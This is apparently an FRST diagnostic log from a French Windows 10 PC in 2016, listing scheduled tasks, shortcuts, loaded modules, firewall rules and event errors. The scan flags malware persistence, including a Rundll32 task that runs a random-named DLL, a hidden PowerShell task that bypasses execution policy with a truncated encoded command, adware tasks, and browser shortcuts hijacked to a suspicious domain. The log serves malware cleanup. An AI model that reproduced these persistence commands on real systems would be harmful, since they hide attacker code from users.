==================== Tâches planifiées (Avec liste blanche) =============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {01BF1B79-43F0-475F-98A1-92C374FA951E} - System32\Tasks\leonDojoWhenasV2 => Rundll32.exe NeocolonialistsGenocidal.dll,main 7 1 <==== ATTENTION
Task: {097BFB8B-8E06-4931-A01A-DFED6D374FB2} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [2016-04-25] ()
Task: {09BE6CE3-7901-469C-9AD0-DEC0887EF27C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier <==== ATTENTION
Task: {159786BF-7CDD-4377-B7AF-355E2D6A6ACC} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2014-04-11] ()
Task: {1815A6ED-8119-48F6-81AC-AFBEF71560D3} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-28] (Google Inc.)
Task: {1FBAE9FB-DA75-436B-B8B5-3B0B68C1193F} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier <==== ATTENTION
Task: {22601BC6-C222-4075-8B1D-32D36116B1B3} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [2016-04-25] ()
Task: {299DB631-3301-4838-934B-0151375ACD72} - System32\Tasks\{01364B9F-BC12-1420-6723-2F8DE4B5D2BD} => C:\Users\leon\AppData\Roaming\PriceFountainUpdateVer\productupdate.exe [2013-04-12] () <==== ATTENTION
Task: {343381DA-2856-4555-A558-D2783D3DCB64} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Pas de fichier <==== ATTENTION
Task: {3442FB15-641D-458F-AE93-710F176F658E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier <==== ATTENTION
Task: {36E27157-D0DB-4D2D-A708-3BCE4417161E} - System32\Tasks\ASUS\ASUS Product Register Service => C:\Program Files (x86)\ASUS\APRP\aprp.exe [2014-09-02] (ASUSTek Computer Inc.)
Task: {55A999D3-61FF-43BE-A985-C64408631865} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Pas de fichier <==== ATTENTION
Task: {58D52DA3-0A43-494A-9870-B66A32C1CD23} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2014-04-02] (ASUS)
Task: {682B52FE-2470-41B9-AC07-FACBAC1A7910} - System32\Tasks\{3065E0C3-D223-4C1B-9F06-264AB391D02A} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Medstock\uninstall.exe" -c shuz -f "C:\Program Files (x86)\Common Files\Medstock\uninstall.dat" -a uninstallme DF770D61-C0B3-46C9-8FAC-E8B6AE40D44E DeviceId=1a76d8d9-6e57-4cd1-9068-53908d708bb9 BarcodeId=51113011 ChannelId=11 DistributerName=APSFTuto4PC
Task: {6BB1F596-2694-4EF9-921C-6CAABBBE2618} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-04-13] (Microsoft Corporation)
Task: {70314142-96A6-407C-9154-B9C44DED08FD} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-28] (Google Inc.)
Task: {873470B4-480B-4B00-A81C-81418B20DC2B} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {8FCF00EA-C42A-44C3-87C3-B34094DE8D50} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {953F966C-D046-49C3-B45E-D6F9099AADC3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION
Task: {981407EC-AB47-47D5-BF76-30A4B3BDA888} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Pas de fichier <==== ATTENTION
Task: {9988C6CA-BC08-43F7-A2F1-FFEDAB3668B7} - System32\Tasks\{BE1F1286-5D21-417E-900A-6EB5E171961F} => pcalua.exe -a C:\Users\leon\Downloads\spywebcamlight.exe -d C:\Users\leon\Downloads
Task: {9D36344E-2838-4DAD-BB36-D32A4D2D45A6} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-09-16] (Piriform Ltd)
Task: {9EA4FBBF-EA62-4875-B8D9-BD12821E5C7D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Pas de fichier <==== ATTENTION
Task: {AA370152-9299-4A0F-8111-B49C9F3503F4} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {B5128945-5F2E-4246-8F68-99B44E7EE418} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-06-24] (Realtek Semiconductor)
Task: {B7F40406-03A6-41DD-AC61-807F2694EF9A} - System32\Tasks\ASUS USB Charger Plus => C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe [2014-03-27] (ASUSTek Computer Inc.)
Task: {BC2047C3-D26A-44FA-928D-F7515ADB9C86} - System32\Tasks\{79047E47-7D0A-797A-0C11-7D0F7D091178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwA7ADsAOwAgACAAIAAgADsAOwA7ACAAOwA7ADsAIAAgACAAOwAgADsAIAAgADsAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIA (l'élément de données a 9836 caractères en plus). <==== ATTENTION
Task: {C01D02BE-ABD8-4E20-BD35-5D8CEEA287C2} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier <==== ATTENTION
Task: {C932E0D9-0FAD-4684-8196-81AE0B98F9D4} - System32\Tasks\Microsoft Office 15 Sync Maintenance for VICTOR-leon victor => C:\Program Files\Microsoft Office\Office15\MsoSync.exe [2014-01-23] (Microsoft Corporation)
Task: {D0CDC4E9-270B-49C7-A27C-62A020ADBEF8} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {D4A0BC83-321D-4CBB-8006-974C999E28CC} - System32\Tasks\{8163FB91-6CAC-48D0-8472-236359389C9E} => pcalua.exe -a "C:\Users\leon\Downloads\WMEncoder webcam .exe" -d C:\Users\leon\Downloads
Task: {DBEE3D26-7F02-4B0D-ADF8-927A838774C2} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe
Task: {DF53D093-4A8F-452C-AE7D-E494914878C5} - System32\Tasks\ATK Package 36D18D69AFC3 => C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\SimAppExec.exe [2014-01-14] (ASUSTek Computer Inc.)
Task: {E1731A1E-EDBE-4B79-A8F6-D8B76233EB67} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-06-24] (Realtek Semiconductor)
Task: {E81EFEFB-DE30-4BC7-9A46-BF8FB07BAB27} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Pas de fichier <==== ATTENTION
Task: {EB239310-EAFB-4625-827D-C7A64B71C2E2} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier <==== ATTENTION
Task: {EC029CFB-CE8A-4A7B-8419-32206DF823C7} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\{01364B9F-BC12-1420-6723-2F8DE4B5D2BD}.job =>
==================== Raccourcis =============================
(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome (2).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\leon\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://yeabests.cc
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://yeabests.cc
==================== Modules chargés (Avec liste blanche) ==============
2015-10-30 09:18 - 2015-10-30 09:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-02-28 17:35 - 2015-07-13 19:37 - 00116552 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-04-13 14:06 - 2016-03-29 12:20 - 02656952 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-02-27 19:59 - 2016-02-27 19:59 - 00402344 _____ () C:\WINDOWS\system32\igfxTray.exe
2016-04-13 14:06 - 2016-03-29 12:20 - 02656952 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-04-21 08:40 - 2016-04-21 08:40 - 00959176 _____ () C:\Users\leon\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\amd64\ClientTelemetry.dll
2016-02-28 17:24 - 2016-02-28 17:24 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-04-13 14:02 - 2016-04-02 05:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-04-13 14:04 - 2016-04-02 05:03 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-04-13 14:04 - 2016-04-02 04:58 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-04-13 14:05 - 2016-04-02 04:59 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-04-13 14:05 - 2016-04-02 05:02 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-09-16 21:33 - 2015-09-16 21:33 - 00065536 _____ () C:\Program Files\CCleaner\lang\lang-1036.dll
2014-04-02 16:46 - 2014-04-02 16:46 - 00117248 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2014-04-02 16:46 - 2014-04-02 16:46 - 00037936 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2014-04-02 16:46 - 2014-04-02 16:46 - 00018992 _____ () C:\Program Files (x86)\ASUS\Splendid\AMDColorEnhance.dll
2014-04-02 16:46 - 2014-04-02 16:46 - 00020528 _____ () C:\Program Files (x86)\ASUS\Splendid\AMDRegammaAndGamut.dll
2016-04-21 08:40 - 2016-04-21 08:40 - 00679624 _____ () C:\Users\leon\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\ClientTelemetry.dll
2016-04-25 23:31 - 2016-04-25 23:31 - 00370688 _____ () C:\Users\leon\AppData\Local\DojoWhenas\NeocolonialistsGenocidal.dll
2016-04-11 21:52 - 2016-04-06 12:04 - 01675928 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libglesv2.dll
2016-04-11 21:52 - 2016-04-06 12:04 - 00086168 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libegl.dll
==================== Alternate Data Streams (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)
==================== Mode sans échec (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"
==================== EXE Association (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)
==================== Internet Explorer sites de confiance/sensibles ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)
IE trusted site: HKU\.DEFAULT\...\amazon.com -> hxxps://amazon.com
IE trusted site: HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\amazon.com -> hxxps://amazon.com
==================== Hosts contenu: ===============================
(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)
2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Autres zones ============================
(Actuellement, il n'y a pas de correction automatique pour cette section.)
HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img1.jpg
DNS Servers: 62.197.111.140 - 109.88.203.3
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Le Pare-feu est activé.
==================== MSCONFIG/TASK MANAGER éléments désactivés ==
(Actuellement, il n'y a pas de correction automatique pour cette section.)
HKLM\...\StartupApproved\StartupFolder: => "WinZip Quick Pick.lnk"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\StartupApproved\Run: => "DVSSkypeRecorder"
HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\StartupApproved\Run: => "IncrediMail"
HKU\S-1-5-21-2442018056-4287239082-1881538495-1001\...\StartupApproved\Run: => "Viber"
==================== RèglesPare-feu (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{EAA16094-1F14-4988-A478-2B926BC47D86}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe
FirewallRules: [{F9BC83C1-1CC3-467C-8934-55378BDA8ECD}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe
FirewallRules: [{D2C2AC86-DDB8-46F1-9FD2-1A8FCFD6935B}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe
FirewallRules: [{70E8E75F-8868-44FE-9A46-A97B2C054903}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe
FirewallRules: [UDP Query User{47C79850-E483-49C7-B965-24B203B921AB}C:\program files (x86)\wolfenstein the new order\wolfneworder_x64.exe] => (Allow) C:\program files (x86)\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [TCP Query User{AB1EADC3-FBC0-41C2-923B-D2D0433F37FC}C:\program files (x86)\wolfenstein the new order\wolfneworder_x64.exe] => (Allow) C:\program files (x86)\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [UDP Query User{A1460159-903F-4892-BA30-FE33CAD5EFE1}C:\program files\vuze\azureus.exe] => (Block) C:\program files\vuze\azureus.exe
FirewallRules: [TCP Query User{0F7947F0-53A1-4A5C-AFEB-F7BD34A22D1F}C:\program files\vuze\azureus.exe] => (Block) C:\program files\vuze\azureus.exe
FirewallRules: [UDP Query User{B8ADD38B-D3AF-4672-A1DF-010C16C593F0}C:\program files (x86)\activision\call of duty black ops ii\t6sp.exe] => (Allow) C:\program files (x86)\activision\call of duty black ops ii\t6sp.exe
FirewallRules: [TCP Query User{9E00C281-855B-4885-B46B-0A2BB1AF62A7}C:\program files (x86)\activision\call of duty black ops ii\t6sp.exe] => (Allow) C:\program files (x86)\activision\call of duty black ops ii\t6sp.exe
FirewallRules: [{A83ADCB4-183C-49D2-A729-F4B9BCECCDFE}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A1A4E17B-6D1C-4205-A35D-3DDE93324764}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{5F13379C-E318-43DA-802A-86F7ECB0B43E}C:\program files (x86)\activision\call of duty black ops ii\t6mp.exe] => (Allow) C:\program files (x86)\activision\call of duty black ops ii\t6mp.exe
FirewallRules: [TCP Query User{99FF6AC5-D665-45F2-B7FA-692A6AC81006}C:\program files (x86)\activision\call of duty black ops ii\t6mp.exe] => (Allow) C:\program files (x86)\activision\call of duty black ops ii\t6mp.exe
FirewallRules: [{D48F6F7F-BD46-41F0-BD6B-37F58504FF32}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{400AD69D-C434-4D5A-A161-9D9CDED9297C}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{E5F86C91-7F3B-4057-9D44-8394BCFA6B3E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{1DF701CD-1CC2-4086-9A61-5763E52CA094}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{6A9E7764-5922-4C3D-B4E5-2B4F8773BF88}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{455BB0AE-1258-4DCA-8C71-90DC740C5CEE}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{6AE54166-2AD1-4980-B819-1892EF836922}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{3A672DA9-9C33-49EB-ABFB-08A86217710F}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{9F55C755-3C12-4F27-ABFB-AFCD93E32DCB}] => (Allow) C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{68FA0273-BFCA-42CB-B8DF-FF18D00606E9}] => (Allow) C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{9627186B-25B5-4CE6-83C2-5E5B13F663C7}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe
FirewallRules: [{FF0E6C3F-ECA0-44AC-BD88-33F873DC55D8}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe
FirewallRules: [{7AB87EB7-A122-4155-9E26-E726535482C4}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe
FirewallRules: [{035C7EAB-50F2-496F-862D-5BA698759899}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe
FirewallRules: [{F9AE7B9F-BDB3-4FA8-B4D2-4D7A9A2C46C4}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe
FirewallRules: [{C4C2FCAA-FD53-4382-9CFF-13FE9B0A2B2B}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe
FirewallRules: [{2167CEB6-FEE6-4E10-A34E-E07111CA155A}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe
FirewallRules: [{97869EF8-0AF8-45B2-BFA0-E47A6952820A}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe
FirewallRules: [{17B5A5E7-A332-46CA-9738-DECDF6CF0FD7}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{8D127F4E-D4F9-4C51-9F78-482152080C46}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe
FirewallRules: [{991FA9E3-BEE5-482A-800F-1E8AE09EB29D}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe
FirewallRules: [TCP Query User{5CDABFA4-BDA7-48F8-B184-07C4216C319F}C:\program files (x86)\murdered soul suspect\binaries\win64\murdered.exe] => (Allow) C:\program files (x86)\murdered soul suspect\binaries\win64\murdered.exe
FirewallRules: [UDP Query User{B21646E7-217E-4CD9-AB6F-689F025356F1}C:\program files (x86)\murdered soul suspect\binaries\win64\murdered.exe] => (Allow) C:\program files (x86)\murdered soul suspect\binaries\win64\murdered.exe
FirewallRules: [{51A6B5AF-ADF2-455C-AF09-D68370ABDB76}] => (Allow) C:\Users\leon\AppData\Roaming\UPUpdata\download\MiniThunderPlatform.exe
FirewallRules: [{3059FE89-9459-4628-BB2B-711E5022FC05}] => (Allow) C:\Users\leon\AppData\Roaming\UPUpdata\download\MiniThunderPlatform.exe
FirewallRules: [{B6E6A3B3-5ABD-4B13-8F9B-AE5D82F39223}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
FirewallRules: [{96AFC04F-79C7-4E79-96DE-B31D2F618B20}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\Downloader\download\MiniThunderPlatform.exe
FirewallRules: [{B5C1E4DC-0398-4F81-B7F4-4369AC35147A}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
FirewallRules: [{32B7A664-758E-4A7A-9F6C-ED5FE220CBEB}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{11296EC4-F832-45BB-B478-D14CD830A308}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{AEB73EE9-C3AB-420C-AD7D-823B1A6F2259}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{155320AB-37A7-409D-8C52-890060698172}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
==================== Points de restauration =========================
20-04-2016 18:09:20 Point de contrôle planifié
24-04-2016 08:20:30 Opération de restauration
==================== Éléments en erreur du Gestionnaire de périphériques =============
==================== Erreurs du Journal des événements: =========================
Erreurs Application:
==================
Error: (04/26/2016 08:16:59 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418154
Error: (04/25/2016 10:42:03 PM) (Source: DptfEvent) (EventID: 1) (User: )
Description: DptfParticipantDisplayService
GetDisplayBrightnessFromPowerSettings: Could not inform driver of current brightness value.
Error: (04/25/2016 10:42:03 PM) (Source: DptfEvent) (EventID: 1) (User: )
Description: DptfParticipantDisplayService
SetBrightnessSettingInDriver: p_handle is NULL.
Error: (04/25/2016 10:42:03 PM) (Source: DptfEvent) (EventID: 1) (User: )
Description: DptfParticipantDisplayService
SetDisplayBrightnessViaPowerSettings: Could not obtain brightness value to set from driver.
Error: (04/25/2016 10:42:03 PM) (Source: DptfEvent) (EventID: 1) (User: )
Description: DptfParticipantDisplayService
GetBrightnessSettingFromDriver: p_handle is NULL.
Error: (04/25/2016 10:42:03 PM) (Source: DptfEvent) (EventID: 2) (User: )
Description: DptfParticipantDisplayService
ConnectToDptfDisplayDriver: SetupDiEnumDeviceInterfaces() failed.
Last error = [0x00000103]
Error: (04/25/2016 10:16:04 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418154
Error: (04/25/2016 10:12:17 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: rdyboost4
Error: (04/25/2016 10:04:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante nw.exe, version : 0.0.0.0, horodatage : 0x55b872f9
Nom du module défaillant : nw.exe, version : 0.0.0.0, horodatage : 0x55b872f9
Code d’exception : 0x80000003
Décalage d’erreur : 0x000edd29
ID du processus défaillant : 0x1b64
Heure de début de l’application défaillante : 0xnw.exe0
Chemin d’accès de l’application défaillante : nw.exe1
Chemin d’accès du module défaillant: nw.exe2
ID de rapport : nw.exe3
Nom complet du package défaillant : nw.exe4
ID de l’application relative au package défaillant : nw.exe5
Error: (04/25/2016 10:02:58 PM) (Source: DptfEvent) (EventID: 1) (User: )
Description: DptfParticipantDisplayService
GetDisplayBrightnessFromPowerSettings: Could not inform driver of current brightness value.
Erreurs système:
=============
Error: (04/26/2016 08:15:27 AM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT)
Description: propres à l’applicationLocalActivation{3185A766-B338-11E4-A71E-12E3F512A338}{7006698D-2974-4091-A424-85DD0B909E23}AUTORITE NTSERVICE RÉSEAUS-1-5-20LocalHost (avec LRPC)Non disponibleNon disponible
Error: (04/26/2016 08:10:49 AM) (Source: DCOM) (EventID: 10016) (User: VICTOR)
Description: par défaut de l’ordinateurLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}victorleonS-1-5-21-2442018056-4287239082-1881538495-1001LocalHost (avec LRPC)Microsoft.WindowsStore_2016.29.13.0_x64__8wekyb3d8bbweS-1-15-2-1609473798-1231923017-684268153-4268514328-882773646-2760585773-1760938157
Error: (04/26/2016 08:10:24 AM) (Source: DCOM) (EventID: 10010) (User: AUTORITE NT)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}
Error: (04/26/2016 12:05:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Accès aux données utilisateur_65bee s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 10000 millisecondes : Redémarrer le service.
Error: (04/26/2016 12:05:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Stockage des données utilisateur_65bee s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 10000 millisecondes : Redémarrer le service.
Error: (04/26/2016 12:05:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Données de contacts_65bee s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 10000 millisecondes : Redémarrer le service.
Error: (04/26/2016 12:05:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Hôte de synchronisation_65bee s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 10000 millisecondes : Redémarrer le service.
Error: (04/26/2016 12:05:27 AM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT)
Description: propres à l’applicationLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}AUTORITE NTSystèmeS-1-5-18LocalHost (avec LRPC)Non disponibleNon disponible
Error: (04/25/2016 10:56:53 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT)
Description: propres à l’applicationLocalActivation{3185A766-B338-11E4-A71E-12E3F512A338}{7006698D-2974-4091-A424-85DD0B909E23}AUTORITE NTSERVICE RÉSEAUS-1-5-20LocalHost (avec LRPC)Non disponibleNon disponible
Error: (04/25/2016 10:46:03 PM) (Source: DCOM) (EventID: 10010) (User: AUTORITE NT)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}
CodeIntegrity:
===================================
Date: 2016-04-25 22:01:13.005
